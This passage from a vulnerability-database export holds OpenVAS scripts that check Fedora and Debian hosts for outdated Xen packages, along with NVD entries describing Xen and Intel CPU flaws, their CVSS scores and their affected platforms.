value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-5521156807\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-5521156807\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C7X7HOMV5LPDSELNUPIPYQTIPFBGJEJQ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~3.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-3665", "CVE-2018-8897", "CVE-2018-10982", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-30T00:00:00", "id": "OPENVAS:1361412562310874755", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874755", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-d3cb6f113c", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_d3cb6f113c_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-d3cb6f113c\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874755\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-30 06:02:58 +0200 (Sat, 30 Jun 2018)\");\n script_cve_id(\"CVE-2018-3665\", \"CVE-2018-3639\", \"CVE-2018-8897\", \"CVE-2018-10982\",\n \"CVE-2018-10981\", \"CVE-2018-10472\", \"CVE-2018-10471\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-d3cb6f113c\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d3cb6f113c\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ALMLZ3SKTV3RRHYNXOE5J7YVGWZZ2O4C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~4.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:06:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7540", "CVE-2018-15470", "CVE-2018-12893", "CVE-2018-7541", "CVE-2018-15469", "CVE-2018-8897", "CVE-2018-12891"], "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, information leaks or privilege\nescalation.", "modified": "2020-01-29T00:00:00", "published": "2018-11-12T00:00:00", "id": "OPENVAS:1361412562310891577", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891577", "type": "openvas", "title": "Debian LTS: Security Advisory for xen (DLA-1577-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891577\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-12891\", \"CVE-2018-12893\", \"CVE-2018-15469\", \"CVE-2018-15470\", \"CVE-2018-7540\",\n \"CVE-2018-7541\", \"CVE-2018-8897\");\n script_name(\"Debian LTS: Security Advisory for xen (DLA-1577-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-12 00:00:00 +0100 (Mon, 12 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/11/msg00013.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"xen on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n4.4.4lts4-0+deb8u1.\n\nWe recommend that you upgrade your xen packages.\");\n\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, information leaks or privilege\nescalation.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-4.4\", ver:\"4.4.4lts4-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.4.4lts4-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.4.4lts4-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.4-amd64\", ver:\"4.4.4lts4-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.4-armhf\", ver:\"4.4.4lts4-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-amd64\", ver:\"4.4.4lts4-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-armhf\", ver:\"4.4.4lts4-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-4.4\", ver:\"4.4.4lts4-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-common\", ver:\"4.4.4lts4-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.4.4lts4-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:52:23", "description": "An issue was discovered in Xen through 4.10.x allowing x86 PV guest OS users to cause a denial of service (out-of-bounds zero write and hypervisor crash) via unexpected INT 80 processing, because of an incorrect fix for CVE-2017-5754.", "edition": 6, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2018-04-27T15:29:00", "title": "CVE-2018-10471", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10471"], "modified": "2018-10-31T10:30:00", "cpe": ["cpe:/o:xen:xen:4.10.1", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-10471", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10471", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.10.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:23", "description": "An issue was discovered in Xen through 4.10.x allowing x86 HVM guest OS users (in certain configurations) to read arbitrary dom0 files via QMP live insertion of a CDROM, in conjunction with specifying the target file as the backing file of a snapshot.", "edition": 6, "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2018-04-27T15:29:00", "title": "CVE-2018-10472", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10472"], "modified": "2018-10-31T10:30:00", "cpe": ["cpe:/o:xen:xen:4.10.1", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-10472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10472", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:xen:xen:4.10.1:*:*:*:*:*:x86:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:42", "description": "An issue was discovered in Xen through 4.10.x allowing x86 PV guest OS users to cause a denial of service (host OS CPU hang) via non-preemptable L3/L4 pagetable freeing.", "edition": 6, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2018-02-27T19:29:00", "title": "CVE-2018-7540", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7540"], "modified": "2018-11-13T11:29:00", "cpe": ["cpe:/o:xen:xen:4.10.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-7540", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7540", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.10.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:42", "description": "An issue was discovered in Xen through 4.10.x allowing guest OS users to cause a denial of service (hypervisor crash) or gain privileges by triggering a grant-table transition from v2 to v1.", "edition": 7, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-02-27T19:29:00", "title": "CVE-2018-7541", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 6.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7541"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:xen:xen:4.10.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-7541", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7541", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.10.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:42", "description": "An issue was discovered in Xen 4.8.x through 4.10.x allowing x86 PVH guest OS users to cause a denial of service (NULL pointer dereference and hypervisor crash) by leveraging the mishandling of configurations that lack a Local APIC.", "edition": 7, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2018-02-27T19:29:00", "title": "CVE-2018-7542", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7542"], "modified": "2018-10-31T10:32:00", "cpe": ["cpe:/o:xen:xen:4.10.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-7542", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7542", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.10.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:43", "description": "A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL < 3, the debug exception is delivered after the transfer to CPL < 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-08T18:29:00", "title": "CVE-2018-8897", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8897"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:citrix:xenserver:7.4", "cpe:/o:synology:diskstation_manager:6.1", "cpe:/o:synology:diskstation_manager:6.0", "cpe:/a:citrix:xenserver:7.2", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:citrix:xenserver:6.0.2", "cpe:/o:redhat:enterprise_virtualization_manager:3.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:synology:diskstation_manager:5.2", "cpe:/a:citrix:xenserver:7.0", "cpe:/o:xen:xen:-", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:citrix:xenserver:7.3", "cpe:/a:citrix:xenserver:6.5", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:citrix:xenserver:6.2.0", "cpe:/a:citrix:xenserver:7.1", "cpe:/a:synology:skynas:-", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-8897", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8897", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:synology:diskstation_manager:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:citrix:xenserver:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:-:*:*:*:*:*:x86:*", "cpe:2.3:a:citrix:xenserver:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_virtualization_manager:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:synology:skynas:-:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.2.0:*:*:*:*:*:*:*", "cpe:2.3:o:synology:diskstation_manager:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:synology:diskstation_manager:6.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:36:47", "description": "Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.", "edition": 9, "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2018-01-04T13:29:00", "title": "CVE-2017-5754", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2020-05-05T11:31:00", "cpe": ["cpe:/h:intel:core_i3:4330t", "cpe:/h:intel:core_i7:840qm", "cpe:/h:intel:core_i3:530", "cpe:/h:intel:celeron_n:n4000", "cpe:/h:intel:core_i5:4200u", "cpe:/h:intel:core_i5:2405s", "cpe:/h:intel:xeon_e3_1225_v3:-", "cpe:/h:intel:core_i7:4710hq", "cpe:/h:intel:xeon_phi:7230f", "cpe:/h:intel:xeon_e5:2680", "cpe:/h:intel:xeon:e5520", "cpe:/h:intel:xeon_e5_2407_v2:-", "cpe:/h:intel:pentium_n:n3520", "cpe:/h:intel:core_i7:875k", "cpe:/h:intel:atom_z:z3735e", "cpe:/h:intel:core_i3:6098p", "cpe:/h:intel:xeon_e5_2448l:-", "cpe:/h:intel:core_i7:870s", "cpe:/h:intel:core_i7:4610m", "cpe:/h:intel:core_i7:2675qm", "cpe:/h:intel:core_i7:4702ec", "cpe:/h:intel:xeon_e5:4648_v3", "cpe:/h:intel:xeon_e5_2620_v2:-", "cpe:/h:intel:xeon_e3_1240_v2:-", "cpe:/h:intel:xeon_gold:6138", "cpe:/h:intel:core_i5:480m", "cpe:/h:intel:xeon_e5_2637:-", "cpe:/h:intel:xeon_e5_2618l_v3:-", "cpe:/h:intel:atom_z:z3736g", "cpe:/h:intel:xeon_e5_1660_v3:-", "cpe:/h:intel:xeon_e5_2650l_v3:-", "cpe:/h:intel:xeon_silver:4116t", "cpe:/h:intel:xeon_gold:6144", "cpe:/h:intel:xeon_phi:7250f", "cpe:/h:intel:atom_x3:c3230rk", "cpe:/h:intel:xeon_e3_1270:-", "cpe:/h:intel:xeon_platinum:8176f", "cpe:/h:intel:core_i3:2330e", "cpe:/h:intel:core_i5:4410e", "cpe:/h:intel:core_i7:4700hq", "cpe:/h:intel:core_i7:610e", "cpe:/h:intel:celeron_n:n2808", "cpe:/h:intel:core_i3:2340ue", "cpe:/h:intel:core_i7:4800mq", "cpe:/h:intel:xeon_gold:6126t", "cpe:/h:intel:xeon_e5:4603_v2", "cpe:/h:intel:core_m:5y31", "cpe:/h:intel:xeon_e5:4620", "cpe:/h:intel:core_i7:2620m", "cpe:/h:intel:xeon_e5_1428l_v3:-", "cpe:/h:intel:xeon:w5580", "cpe:/h:intel:atom_z:z2460", "cpe:/h:intel:core_i5:3550", "cpe:/h:intel:xeon_e7:8867_v4", "cpe:/h:intel:xeon_gold:6138t", "cpe:/h:intel:atom_c:c2358", "cpe:/h:intel:core_i3:2120", "cpe:/h:intel:xeon_e3_1501l_v6:-", "cpe:/h:intel:xeon:lc5518", "cpe:/h:intel:core_i5:6400t", "cpe:/h:intel:xeon_e3_1230l_v3:-", "cpe:/h:intel:xeon_e5:4650_v4", "cpe:/h:intel:core_i3:350m", "cpe:/h:intel:core_i7:3615qm", "cpe:/h:intel:core_i3:3227u", "cpe:/h:intel:xeon_e5:2687w", "cpe:/h:intel:xeon_e5_2623_v4:-", "cpe:/h:intel:core_i5:4200y", "cpe:/h:intel:core_i3:2357m", "cpe:/h:intel:core_i7:4750hq", "cpe:/h:intel:atom_c:c3858", "cpe:/h:intel:core_i3:2377m", "cpe:/h:intel:core_m:5y10", "cpe:/h:intel:core_i7:3537u", "cpe:/h:intel:xeon_e3_1245:-", "cpe:/h:intel:xeon_e5_2470_v2:-", "cpe:/h:intel:xeon_e5_2408l_v3:-", "cpe:/h:intel:core_i5:4422e", 